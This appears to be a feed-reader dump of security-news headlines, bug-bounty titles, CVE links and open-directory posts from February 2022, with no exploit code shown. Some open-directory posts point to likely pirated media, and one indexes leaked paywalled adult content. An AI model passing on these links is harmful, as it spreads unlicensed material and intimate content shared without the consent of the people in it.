    Helping users stay safe: Blocking internet macros by default in Office
    submitted by /u/dmchell [link] [comments]  ( 1 min )
  • Open

    Some OS ISO (Fast Download)
    Some Linux and Windows (Some in Pt/de/ru/en) ISO, The server has a pretty decent speed
    | Url: https://root3.minerswin.de/ISO/ | | Urls file |
    | Extension (Top 5) | Files | Size |
    | .iso | 102 | 195,47 GiB |
    | .zip | 50 | 60,06 GiB |
    | .xz | 18 | 14,95 GiB |
    | .ova | 4 | 11,6 GiB |
    | .7z | 2 | 3,7 GiB |
    | Dirs: 71 Ext: 12 | Total: 323 | Total: 288,59 GiB |
    | Date (UTC): 2022-02-08 23:22:22 | Time: 00:00:03 | Speed: 46,65 MB/s (373,2 mbit) |
    Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/)
    submitted by /u/VoXaN24 [link] [comments]
    Random Stuff in French
    http://5.196.72.204/
    | Url: http://5.196.72.204/ | | Urls file |
    | Extension (Top 5) | Files | Size |
    | .mkv | 141 | 459,53 GiB |
    | .avi | 99 | 70,71 GiB |
    | .mp4 | 533 | 51,46 GiB |
    | .tar | 1 | 28 GiB |
    | .m2ts | 33 | 27,8 GiB |
    | Dirs: 532 Ext: 58 | Total: 4 362 | Total: 683,72 GiB |
    | Date (UTC): 2022-02-08 23:08:45 | Time: 00:00:07 | Speed: 11,11 MB/s (88,9 mbit) |
    Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/)
    submitted by /u/VoXaN24 [link] [comments]
    French Film & Series
    http://www.zoppello.fr/download/
    | Url: http://www.zoppello.fr/download/ | | Urls file |
    | Extension (Top 5) | Files | Size |
    | .mkv | 937 | 668,57 GiB |
    | .avi | 66 | 68,38 GiB |
    | .mp4 | 61 | 22,63 GiB |
    | .ts | 5 | 17 GiB |
    | .flv | 17 | 7,07 GiB |
    | Dirs: 187 Ext: 15 | Total: 1 405 | Total: 790,34 GiB |
    | Date (UTC): 2022-02-08 23:07:02 | Time: 00:00:04 | Speed: 11,05 MB/s (88,4 mbit) |
    Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/)
    submitted by /u/VoXaN24 [link] [comments]
    South Park
    Hey everyone looking for South Park season downloads thanks in advance submitted by /u/Los-Aragon [link] [comments]
  • Open

    SharpSQL: C# MS SQL enum and exploitation
    submitted by /u/IamaCerealKilla [link] [comments]
    SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-22718)
    submitted by /u/ly4k_ [link] [comments]  ( 1 min )
    How Docker Made Me More Capable and the Host Less Secure
    submitted by /u/jat0369 [link] [comments]
    AWS Cloud Security Challenges
    submitted by /u/0xdeadbeef0000 [link] [comments]
    PPE - Poisoned Pipeline Execution. Running malicious code in your CI, without access to your CI
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]  ( 1 min )
    How open-source packages handle releasing security fixes
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]  ( 1 min )
  • Open

    VSCode Remote Development Extension Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21991 Comments URL: https://news.ycombinator.com/item?id=30262516 Points: 8 # Comments: 0
  • Open

    100 Days of Hacking — DAY 4
    Objectives of day 4 : Continue reading on Medium »  ( 1 min )
    SQL Injection, Reflected XSS and Information Disclosure in one subdomain in just 10 minutes
    Hi there, 7odamo is here. First of all this is my first write-up and i am still beginner, So i might write something wrong,Then it’s… Continue reading on Medium »  ( 3 min )
    100 DAYS OF HACKING — DAY 3
    woohoo, sup fellow hackers. it’s day 3 / 100 we have a long way to go. Continue reading on Medium »  ( 1 min )
    Securing Lichess one move at a time
    Hi there, thanks for stopping by and taking some time to read my blog post about how I helped secure my favorite chess playing which if… Continue reading on Medium »  ( 1 min )
    Privilege Escalation Using Wildcard Injection | Tar Wildcard Injection |
    This blog is about how to use Wildcard Injection to escalate privileges to root in Unix-like OS. Continue reading on System Weakness »  ( 2 min )
    Full Account takeover (ATO) — a tale of two bugs
    Hi everyone, I hope we’re all having a swell day. Before I jump into today's bug report, I’d like to express my sincerest gratitude for… Continue reading on Medium »  ( 2 min )
    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today! Continue reading on InfoSec Write-ups »  ( 2 min )
    APWine Incorrect Check of Delegations Bugfix Review
    In the Web2 world, a simple oversight in the code doesn’t always result in a huge breach of data (of course, sometimes they do). In Web3… Continue reading on Immunefi »  ( 4 min )
    2FA Bypass Techniques
    Hello lads, it’s me again. Let’s discuss different techniques about bypassing 2FA. Continue reading on Medium »  ( 2 min )
    You Can Takeover Any GOOGLE Account !
    Thank you for taking the time to read about “ You Can Takeover Any GOOGLE Account ! ” Continue reading on Medium »  ( 2 min )
  • Open

    What is OSINT(Part 2): Dangers of Oversharing
    This article was written in collaboration with Aardwarewolf Continue reading on Medium »  ( 7 min )
    What is OSINT? (Part 2)
    The dangers of oversharing Continue reading on Medium »  ( 8 min )
  • Open

    Something's Amiss . . .
    Hello everyone...super noob alert: I'm taking a digital forensics class and rather than using the virtual lab decided to do some memory analysis on my machine. Since I know little about computers and even less about what I'm looking at, maybe I'm being paranoid, but maybe you can shed some light? As I don't know the email addresses, nor do email addresses like "stealerbyframe@mail.ru", "360saftfirehackr@qq.com", or my favorite "pizda@qq.com"--inspire confidence, those addresses raised some alarms. I used FTK Imager to do a memory dump on my system. I then used Bulk Extractor to organize the data a bit and the screen shot is some emails I found in the email.txt file result. Why, for example, are they in my computer's memory!? https://preview.redd.it/9orfvtravmg81.png?width=1326&format=png&auto=webp&s=65d81163bcd0e35d26a7cc2c88a5025762e36d9a https://preview.redd.it/80togtravmg81.png?width=509&format=png&auto=webp&s=3d14c00dbe7395beb8e682bd2fe0cc50e7d66277 submitted by /u/Funny-Appearance9167 [link] [comments]  ( 2 min )
    Beginner-level mini-course on starting a new investigation with Autopsy. Covers data organization, documentation, new case creation, ingest modules, basic analysis workflow, and exporting reports.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-08 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Beaconfuzz - A Journey into #Ethereum 2.0 Blockchain Fuzzing and Vulnerability Discovery
    submitted by /u/pat_ventuzelo [link] [comments]
    Top 6 Books to learn the Rust Programming Language in 2022
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Cross-site Scripting (XSS) - Stored | forum.acronis.com
    Acronis disclosed a bug submitted by quadrant: https://hackerone.com/reports/1161241 - Bounty: $50
    Stored Cross-site Scripting on devicelock.com/forum/
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1122513 - Bounty: $50
    Subdomains takeover of register.acronis.com, promo.acronis.com, info.acronis.com and promosandbox.acronis.com
    Acronis disclosed a bug submitted by ashmek: https://hackerone.com/reports/1018790
    Attacker Can Access to any Ticket Support on https://www.devicelock.com/support/
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1124974 - Bounty: $250
    Information Disclosure via ZIP file on AWS Bucket [http://acronis.1.s3.amazonaws.com]
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1121771
  • Open

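    2021 Global Industrial Cybersecurity Situation Report
    六方云 draws on the content of its 50 weekly security situation bulletins from 2021 to analyze in detail the current state of global industrial security, give a multi-angle view of the industrial security situation, and provide a useful reference for those responsible for industrial security.  ( 1 min )
    Research on identifying and exploiting command execution when no output is echoed back
    During penetration testing, vulnerability hunting or security research, we run into many command execution points that return no output.  ( 1 min )
    FreeBuf Morning Brief | Meta threatens to leave Europe; there are no free "red envelopes" online
    Meta has threatened to consider pulling out of Europe if the EU does not allow the company's US operations, applications and data centers to share EU user data.  ( 1 min )
    Case analysis: incident response to a phishing email at site X
    There are many incident response articles, but few on how to put incident response into practice with the SANS and NIST framework models; this is a simple model-based analysis of the current site X phishing email case, from a personal point of view only.  ( 1 min )
    Morley, a company serving the Global 100, hit by ransomware attack, leaking large amounts of user information
    The types of data leaked include names, addresses, Social Security numbers, dates of birth, client identification numbers, medical diagnosis and treatment information, and health insurance information.
    Shanghai's first "Enterprise Data Compliance Guidelines" released
    The Guidelines have six chapters and thirty-eight articles, and mainly set out rules for enterprises' data compliance management structure and for risk identification and handling.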
  • Open

    CVE-2021-4160: OpenSSL carry propagation bug in some TLS 1.3 default curves
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-4160 Comments URL: https://news.ycombinator.com/item?id=30256773 Points: 2 # Comments: 0  ( 4 min )
  • Open

    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today!  ( 2 min )

  • Open

    Lots of music
    Mostly 320kbit mp3. Complete collections. Great KISS folder. http://nordserv.no/english/ submitted by /u/inoculatemedia [link] [comments]
    More music some flac
    https://www.aidd.org/conspiracy/03/sounds/mp3s/ submitted by /u/inoculatemedia [link] [comments]
    Rap and R&B
    http://bawkawajwanw.com/Music/ submitted by /u/inoculatemedia [link] [comments]
    QSL.NET 's Old Radio Client Programming Software CPS RSS (Including GR1225 RSS 4.0)
    submitted by /u/Goldmann_Sachs [link] [comments]  ( 1 min )
  • Open

    February Newsletter
    The following is a monthly conglomeration of articles, sites and techniques that we have found both interesting, and beneficial, to our… Continue reading on Medium »  ( 2 min )
    Why Is Iceland So Small- OSINT Challenge 12
    On Jan 17, 2022, OSINT Dojo shared a new OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken… Continue reading on Medium »  ( 1 min )
  • Open

    Linux Privilege Escalation: PwnKit (CVE 2021-4034)
    Introduction Team Qualys discovered a local privilege escalation vulnerability in PolicyKit’s (polkit) setuid tool pkexec which allows low-level users to run commands as privileged users. The post Linux Privilege Escalation: PwnKit (CVE 2021-4034) appeared first on Hacking Articles.  ( 5 min )
  • Open

    Tailscale CVE: TS-2022-001
    Article URL: https://tailscale.com/security-bulletins/#ts-2022-001 Comments URL: https://news.ycombinator.com/item?id=30248447 Points: 2 # Comments: 0  ( 1 min )
    CVE-2021-39137 – a Golang security bug that Rust would have prevented
    Article URL: https://research.nccgroup.com/2022/02/07/a-deeper-dive-into-cve-2021-39137-a-golang-security-bug-that-rust-would-have-prevented/ Comments URL: https://news.ycombinator.com/item?id=30244773 Points: 4 # Comments: 0  ( 7 min )
  • Open

    How we could have listened to anyone’s call recordings.
    About Us: Detect, Prioritize and Negate Cloud Security Threats that matter! https://pingsafe.com Continue reading on Medium »  ( 3 min )
    Rce via Image (jpg,png) File Upload..!
    Remote code execution (RCE) is a class of software security flaws/vulnerabilities. RCE vulnerabilities will allow a malicious actor to… Continue reading on Medium »  ( 1 min )
    Subdomain Takeover
    What is subdomain? Continue reading on Medium »  ( 3 min )
    How to Install BFAC on Kali Linux
    BFAC (Backup File Artifacts Checker): Tool to check backup artifacts that may disclose the web-application’s source code | Sensitive… Continue reading on Medium »  ( 1 min )
    The story of Scamster Tony Capo: Aggressive Cyber Warfare Specialist
    This scamster aka https://tonycapo.net/ or whatever his real name is, has been scamming people since 2019, There are multiple bad reviews… Continue reading on Medium »  ( 1 min )
    How We “Forced” Our Client To Fix A Low Severity Security Bug And Still Got Appreciated!
    We at DefCore Security intend to provide great visibility to clients while working on the pentest engagement. We give our clients the… Continue reading on Medium »  ( 3 min )
    Error: Please run “shodan init ” before using this command
    Hello All, if you ever tried running shodan in Kali Linux and got shodan init error. Then keep reading….! Continue reading on Medium »  ( 1 min )
    Is my organization ready for a bug bounty program?
    Bug Bounty programs can be a great thing for both the organization, as well as for the hacker. The question is, can every organization… Continue reading on Medium »  ( 3 min )
    RCE in .tgz file upload
    Cre: Machevalia’s Blog Continue reading on Medium »  ( 2 min )
    CEH Practical Exam Guide
    Exam Information Continue reading on Medium »  ( 2 min )
  • Open

    How to Make Package Signing Useful
    submitted by /u/dlorenc [link] [comments]
    SHA-256 explained step-by-step visually
    submitted by /u/jandrusk [link] [comments]  ( 2 min )
    Qbot Likes to Move It, Move It
    submitted by /u/TheDFIRReport [link] [comments]
    A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would have prevented
    submitted by /u/digicat [link] [comments]  ( 1 min )
    Shadow Credentials
    submitted by /u/netbiosX [link] [comments]
    UEFI firmware vulnerabilities affect at least 25 computer vendors
    submitted by /u/TryptamineEntity [link] [comments]  ( 1 min )
    Linux Persistence using Systemd Generators. They will run early at boot and can be used to create services and disable other services before they start.
    submitted by /u/dashboard_monkey [link] [comments]  ( 1 min )
    #Phishing like early 90's. Spoofing emails when DMARC isn't available or commonly known as "SPF-BYPASS".
    submitted by /u/intruderK [link] [comments]  ( 1 min )
  • Open

    Application level DOS at Login Page ( Accepts Long Password )
    Reddit disclosed a bug submitted by e100_speaks: https://hackerone.com/reports/1168804
    Leaking sensitive information through JSON file path.
    Nextcloud disclosed a bug submitted by rohitburke: https://hackerone.com/reports/1211061
  • Open

    SecWiki News 2022-02-07 Review
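    ML-DOCTOR: a holistic study of inference attacks against machine learning models by ourren Identifying and tracing black and gray market activity by ourren Grand Theft Auto -- playing with rolling codes (middle part) by ourren For more of the latest articles, visit SecWiki  ( 2 min )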
  • Open

    Email platform Zimbra issues hotfix for XSS vulnerability under active
    Article URL: https://portswigger.net/daily-swig/email-platform-zimbra-issues-hotfix-for-xss-vulnerability-under-active-exploitation Comments URL: https://news.ycombinator.com/item?id=30246174 Points: 1 # Comments: 0  ( 4 min )
  • Open

    Qbot Likes to Move It, Move It
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    Shadow Credentials
    submitted by /u/netbiosX [link] [comments]
    KillDefenderBOF: Beacon Object File PoC implementation of KillDefender
    submitted by /u/5ub34x_ [link] [comments]  ( 1 min )
    #Phishing like early 90's. Spoofing emails when DMARC isn't available or commonly known as "SPF-BYPASS".
    submitted by /u/intruderK [link] [comments]
  • Open

    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials  ( 7 min )
  • Open

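    FreeBuf Morning Post | DHS to focus on addressing the log4j vulnerability; education sector was the hardest hit by cyberattacks in 2021
    The software's widespread use and ease of exploitation make this an extremely serious vulnerability, and DHS's best practice is to concentrate on reviewing the vulnerabilities in the log4j software library and the associated remediation process.  ( 1 min )
    PayBito cryptocurrency exchange suffers cyberattack; large amount of data stolen
    The LockBit ransomware gang claims to have stolen a large amount of customer data from the PayBito cryptocurrency exchange.  ( 1 min )
    Multiple flights delayed! Swiss airport services company Swissport hit by ransomware attack
    Swissport International Ltd. was hit by a ransomware attack, causing multiple flight delays.
    Winter Training Camp | New challenges in advanced threats to mobile devices, and countering and detecting them
    According to public statistics, by mid-2021 the number of mobile internet users had reached 1.007 billion.  ( 1 min )
    Winter Training Camp | New developments in threat frameworks
    This article introduces and analyzes the new developments in research on and application of the ATT&CK threat framework in 2021 from three angles: new content, new directions, and new forces.  ( 1 min )
    Winter Training Camp | Solutions for deploying commercial cryptography applications
    With the deepening of digitalization, networking, and intelligent technologies, and with changes in technologies such as big data, cloud computing, blockchain, and AI, new business models keep emerging across industries.  ( 1 min )
    Microsoft blocked tens of billions of brute-force and phishing attacks last year
    From January 2021 to December 2021, Microsoft blocked more than 25.6 billion Azure AD brute-force authentication attacks and intercepted 35.7 billion phishing emails.  ( 1 min )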
  • Open

    I'm feeling like I'm underpaid at $60k CAD in Montreal Canada
    Hi everyone, I'm currently working as an information security analyst for this non-tech company here in Montreal Canada for 9 months already. I have 7 years of total work experience (5 years customer service, 2 years as an IT tech + SysAdmin). I have the Azure Security Engineer Associate AZ-500 certification. I'm currently paid 60k CAD. Since I'm the only security analyst in my organization, I'm the only one leading multiple security projects. My company has multiple divisions across Canada, South America and Asia with around 1000 employees. My first project after landing the job was the deployment of Bitlocker on every laptop and modern desktop in the company. One of the big projects I'm currently running alone is the architecting and deployment of MFA across all employees and all our divisions + deployment of a new VPN solution for employees, with Multi Factor Authentication on every VPN connection. My biggest duties outside of projects are threat detection and response, training and security awareness to employees, and patching old and vulnerable systems. I think I was lucky to find a security role with no prior security experience, but I feel like I'm underpaid. And my annual evaluation is coming in a month. Should I look around for jobs that could pay me better? Should I meet with my manager and ask for a raise? Thank you Edit: added "architecting MFA" submitted by /u/hey_its_meeee [link] [comments]  ( 2 min )
    Do penetration testers ever get called in at 3AM?
    submitted by /u/notburneddown [link] [comments]  ( 3 min )

  • Open

    The devil is in the details [Authentication Bypass]
    Hello, I’m Taha. Today, I’ll go over one of the vulnerabilities I was rewarded for last month. I hope you enjoy this write-up. Continue reading on Medium »  ( 1 min )
    How To Start BBJ (Bug Bounty Journey)
    Hello Hacker’s & Security Guys Thanks for Your Support So Continue reading on Medium »  ( 1 min )
    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
    Penetration Testing vs Bug Bounty
    When you have a fixed payload list, a fixed methodology, a fixed approach, then effectively penetration testing and bug bounty hunting are… Continue reading on Medium »  ( 2 min )
    How I found a critical P1 bug in 5 minutes using a cellphone — Bug Bounty
    Hello Hackers, I’m MrEmpy I’m 16 and welcome to my first article about a critical bug I found on mobile. Continue reading on Medium »  ( 1 min )
    First Bug Bounty Program found CORS (Cross Origin Resource Sharing ) Misconfiguration
    Hello fellow Security researchers and beginners , in this blog I will be explaining the CORS vulnerability and how I found a potential… Continue reading on Medium »  ( 2 min )
  • Open

    End-2-End file transfer
    Hi, I want to download a file directly from a friend's computer, what's the most secure way to do it with an encrypted tunnel? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    GRC - recommend reading material
    Will be starting a new role in GRC in a couple of months' time and wanted to see if anyone has great reading sources to help hit the ground running. Currently reading the business minded CISO which has helped quite a bit! submitted by /u/SecMac [link] [comments]  ( 1 min )
    Book Recommendations for Memory Level Security
    Hi, I would like to ask for book advice to understand how operating systems' memory level operations work. For example, I want to understand how stack and heap level exploits work on both Windows and Linux systems and what security measures these operating systems have to prevent attacks like heap buffer overflow, process injection and hijacking etc. Where should I start to understand memory level operations on operating systems? Should I know programming languages like C because OSs are mostly written in C? submitted by /u/execute_sh [link] [comments]  ( 1 min )
    How safe are Password Managers Actually?
    Hi, both Bitwarden and 1password are open source. Can anyone in the backend team has a way to look at our passwords? I mean the devs who made those apps must have a way whatsoever? Being double sure before using. What are your thoughts? submitted by /u/TheRealistDude [link] [comments]  ( 3 min )
    How do blackhats monetize stolen accounts without being caught?
    Suppose a blackhat has gotten a victim's e-mail, banking, PayPal etc. account infos, how do they monetize this information without leaving a trail leading back to them? I can't make sense of this. Thanks. submitted by /u/DirectionProof710 [link] [comments]  ( 1 min )
  • Open

    Arbitrary file read in Rocket.Chat-Desktop
    Rocket.Chat disclosed a bug submitted by sectex: https://hackerone.com/reports/943737
  • Open

    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
  • Open

    Miscellaneous NSFW Content from Patreon, Onlyfans, Snapchat, Fansly etc..
    https://theporngrid.com/Uploads/Media/ There's a combination of images and videos from a bunch of different original sources, mostly onlyfans and the like. Everything here is used by ibradome.com (NSFW) for their embedded content I indexed the files: https://gist.githubusercontent.com/RedDeadRandy/bda22a2b6014315597df2259a03815e2/raw/fe1ba95b5d2ec0d2a3e7ebcce96db21c1eda0152/theporngrid_files.txt Some of it is watermarked to find out who the person is while others are a crapshoot. submitted by /u/TattedUp [link] [comments]
    /VIDEOS about China. mostly unexplored PD. to be safe NSFW
    submitted by /u/thats_dumberst [link] [comments]
    Large directory of film scripts, different formats
    http://nldslab.soe.ucsc.edu/charactercreator/film_corpus/film_20100519/all_imsdb_05_19_10/ submitted by /u/inoculatemedia [link] [comments]
    funeral parlour decor and accessories
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    GUARDARA is now free for independent security researchers and non-commercial open-source projects
    submitted by /u/JohnKeymanUK [link] [comments]
  • Open

    Walkthrough — Hacktoria: Geolocation 08
    Back again with another Hacktoria geolocation walkthrough, this time on challenge 08. I must confess that took image took me a bit longer… Continue reading on Medium »  ( 7 min )
  • Open

    OSCP preparation - Buffer Overflow: VANILLA EIP OVERWRITE AND SEH
    submitted by /u/CyberMasterV [link] [comments]
    GUARDARA, a software quality assurance platform to identify bugs and zero-day vulnerabilities at scale, is now free for individual security researchers and non-commercial open-source projects.
    submitted by /u/JohnKeymanUK [link] [comments]  ( 1 min )
    Software Defined Radio, Part 6: Building a Cellphone IMSI Catcher (Stingray)
    submitted by /u/digicat [link] [comments]  ( 1 min )
    CVE-2022-24348 Argo CD Vulnerability and its impact on Kubernetes
    submitted by /u/rippatpop [link] [comments]  ( 1 min )
  • Open

    A Curious Glitch in XSS Sanitizing
    When looking for ways to bypass XSS sanitizing (sanitizing, not filtering), I’ve figured out something interesting but almost useless… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-02-06 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    SysInternals — The Other Way Around
    We all have been sometime, someday in our professional life have used SysInternals Suite. I personally have used these utilities… Continue reading on Medium »  ( 2 min )
    Attack Simulation (Why it is Important!) Part 2 — Get one’s ducks in a row
    Now, following steps through part 1, we have lab setup and running. It is essential to understand how things are working in the background… Continue reading on Medium »  ( 4 min )
  • Open

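    FreeBuf Morning Post | US prosecutes several "scam" call centers; an American hacker launches attack on North Korea's network
    Because of a ransomware attack, oil loading, unloading and transshipment were disrupted at several ports in Amsterdam and Rotterdam in the Netherlands and Antwerp in Belgium.  ( 1 min )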
  • Open

    Shuckworm Continues Cyber-Espionage Attacks Against Ukraine
    submitted by /u/dmchell [link] [comments]

  • Open

    Is it possible to change the messages that are saved to iCloud
    Recently I’m dealing with a situation in which someone has edited the contents of a conversation in iMessages. I figured out how dates could be changed but now I want to know if it’s possible to make what’s saved to iCloud reflect what’s been created. submitted by /u/JasonTheTodd [link] [comments]  ( 1 min )
    How to proceed in the following hypothetical security breach scenario
    Hey, I was met with the following hypothetical scenario during school exam, to which my answer was insufficient. I'd love to hear your takes on it if you don't mind. "Bank's backup data were left unsecured on a public server. Propose a solution to protect data from being misused when this happens again." Thank you. submitted by /u/Ok-Cow-3198 [link] [comments]  ( 2 min )
    A webserver on my home computer
    I am trying to run a webserver on my computer that can be reached from the Internet. From what I understood, I would need to configure my router to allow the incoming http traffic to be forwarded to the webserver. However, for this to work, I would need to have a fixed public address, which is not the case for me. Is there a workaround to make this work without having to fix the IP on the ISP side? submitted by /u/spectnullbyte [link] [comments]  ( 3 min )
    "Technical skills" on a resume?
    I imagine I need something better than just listing the tools I can use. But then again I don't want something as generic as "DNS enumeration" or "Vulnerability Assessment". I've got decent work experience but I'm lacking trying to think of what I can put in the technical skills part that is useful but not bullshittery. submitted by /u/thehunter699 [link] [comments]  ( 1 min )
    Questions about Active Directory pentesting
    Hey everyone! I just started to look into AD stuff and I have a few questions. I hope this is the right subreddit for AD related questions. If not, please direct me to the appropriate one. Questions: If I use LLMNR or IPv6 DNS Poisoning and get the NTLM hash of a local admin, I can use that hash or the cracked password to access the machine he's an admin on. If I manage to fetch the hash of a domain admin, I can log into any machine on the domain including the domain controller. What can I do if I get hash of a lowly domain user? I cannot log into any machine. Can I still authenticate against the DC to get infos like users, policies, etc? Does it make a difference if I only have the hash or the cracked password? If we are only a regular domain user all we can do to escalate our privileges is kerberoasting, correct? Like, we can't do pass the hash / pass the password because we can't get any from a machine. And we can't do token impersonation because, again, we can't get onto any machine. I want to thank everyone in advance for answering any of these questions. Please correct me if I misunderstood anything. I'm really new to AD pentesting. submitted by /u/placeholderbagholder [link] [comments]  ( 3 min )
    When using Public WiFi.. is a VPN essential or should you just ensure you're using HTTPS?
    Hi all, Going travelling around the world and will likely rely on Public WiFi Hotspots. Do I definitely need a VPN or just ensure I'm connecting to sites with HTTPS? What about if I use cellular instead..? Do I need a VPN then? Please let me know your thoughts. Burge x submitted by /u/MyNamesBurge [link] [comments]  ( 3 min )
  • Open

    Firefox JIT Use-After-Frees – Exploiting CVE-2020-26950
    Article URL: https://www.sentinelone.com/labs/firefox-jit-use-after-frees-exploiting-cve-2020-26950/ Comments URL: https://news.ycombinator.com/item?id=30225843 Points: 1 # Comments: 0  ( 23 min )
  • Open

    Shodan: Find Any Device Connected To The Internet
    IoT Devices Search Engine Continue reading on Medium »  ( 1 min )
    How to “build” an Information Security Industry at Home?
    Check out the following personal photos courtesy of Dancho Danchev which describe his experience in the information security industry. Continue reading on Medium »  ( 2 min )
    The UK “Freedom Convoy”
    I’ve been extremely tangentially following the Freedom Convoy activity as part of wider opposition-monitoring efforts, including… Continue reading on Medium »
    FIND THE CAMERA [KNIGHT-CTF]
    as it was mention needed to find the camera model number, exif this image but found nothing. again after reviewing the image get to know… Continue reading on Medium »  ( 1 min )
  • Open

    Solving TryHackMe's Daily Bugle Pt1
    Good morning, afternoon or evening, dear readers. Today I bring you my first post on Medium, the solution to the room… Continue reading on Medium »  ( 2 min )
    [RedDev Series #4] Experimenting SysWhisper2 with LLVM Obfuscator
    Some notes on setting up both LLVM obfuscator and SysWhisper2 in Visual Studio 2019. Continue reading on Medium »  ( 2 min )
  • Open

    Domain Persistence: Computer Accounts
    Introduction Often while configuring Active Directories, system admins don’t recognize the harm that comes with allowing a local administrator account on a system assigned to The post Domain Persistence: Computer Accounts appeared first on Hacking Articles.  ( 7 min )
  • Open

    Does a master’s in cybersecurity and digital forensics require an engineering maths background or is Bachelors in IT with topics like Basic maths, discrete structure and Numerical methods enough?
    What I know from my research is that different universities have different criteria like Calculus I and II, but a basic undergrad IT course may not contain multiple maths topics like a Computer Science or engineering course does. So will a bachelor's in Information Technology be enough to later apply as an international student in different countries for MSc cyber forensics? submitted by /u/axyut [link] [comments]  ( 2 min )
  • Open

    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)… Continue reading on InfoSec Write-ups »  ( 2 min )
    Server-Side Request Forgery to Internal SMTP Access — Indonesia
    To learn the basics of SSRF, you can read Beginner Guide To Exploit Server Side Request Forgery (SSRF) Vulnerability — Indonesia Continue reading on Medium »  ( 2 min )
    All About the CSRF vulnerability
    This Blog is all about the CSRF Vulnerabilities and Lot more BOOM !!!!!!!!!! Continue reading on Medium »  ( 4 min )
    What I’ve learned from hunting bugs for 2 months?
    Bug bounty hunting, a glamourous life of 100k bounties followed by Lamborghini pics on social media. If you are alive and in the part of… Continue reading on Medium »  ( 3 min )
    IDOR with Autorize!
    Here is my write-up, I’m gonna tell you about my recent finding and my first IDOR(Insecure direct object references). Continue reading on Medium »  ( 2 min )
    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello All Continue reading on Medium »  ( 1 min )
  • Open

    oniongrok: Onion addresses for anything.
    submitted by /u/oniongrok [link] [comments]  ( 1 min )
    Testing Infrastructure-as-Code Using Dynamic Tooling
    submitted by /u/digicat [link] [comments]  ( 1 min )
    CISSP Domain 1 - Episode 4 - Business Case, Types of Project Plans, Organizational Process, Change Management and Data Classification by Get Set CISSP
    submitted by /u/Tradition_Wonderful [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-05 Review
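    An addendum to new ways of bypassing WAFs with Java deserialization data by ourren Serial: evolving advanced threat governance (part 5) by ourren For more of the latest articles, visit SecWiki  ( 2 min )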
  • Open

    Vulnerability Disclosure Programs Done the Right Way
    Article URL: https://www.lutasecurity.com/post/vulnerability-disclosure-programs-done-the-right-way Comments URL: https://news.ycombinator.com/item?id=30221511 Points: 2 # Comments: 0  ( 3 min )
  • Open

    Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace
    Hello All Continue reading on Medium »  ( 1 min )
  • Open

    beer labels, sorted by country.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    interior design/architecture photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    O_D Movies/
    https://203.51.37.9:9802/Movies/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]

  • Open

    Philippine Department of the Interior -=-=[ O_D ]=-=-
    http://www.downloads.region10.dilg.gov.ph/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Hazardous material compliance reports
    http://13.113.60.173:81/output/ submitted by /u/WUGGAWUGGAWUGGA [link] [comments]
    Jackpot
    http://dhakaftp.com/Data/ Lots of movies. Really good Download speeds. look for "English movies" or "Hollywood" in folders for movies in English. Try to take it easy as to not overwhelm the site. submitted by /u/soulkrypto [link] [comments]
    Nobel OD server in Romania
    submitted by /u/stereoroid [link] [comments]  ( 1 min )
  • Open

    DD-WRT Post Attack Forensics
    Hello all, I recently discovered my router running DD-WRT has been hacked. What I mean by that is, I got an email from ISP about abuse which indicated my IP has been brute forcing ssh. I went to investigate and noticed my DD-WRT WebGUI is disabled and that my ESXI lab (which had default creds since it was a small lab and not exposed to internet) had been tampered with. I have removed power from the infected router and gotten back online with a cheap walmart backup, but I want to investigate this and get my infected router back online safely without losing evidence. Any DD-WRT advice would be appreciated as to how I should start my analysis. Thanks submitted by /u/the_grey_philosopher [link] [comments]  ( 2 min )
  • Open

    Why are so many ports open on Xiaomi router?
    https://imgur.com/a/zSorMtG submitted by /u/Tqis [link] [comments]  ( 1 min )
    Port Ranges Set to DENY in UFW (Firewall) are Still Allowing Traffic on Those Ports
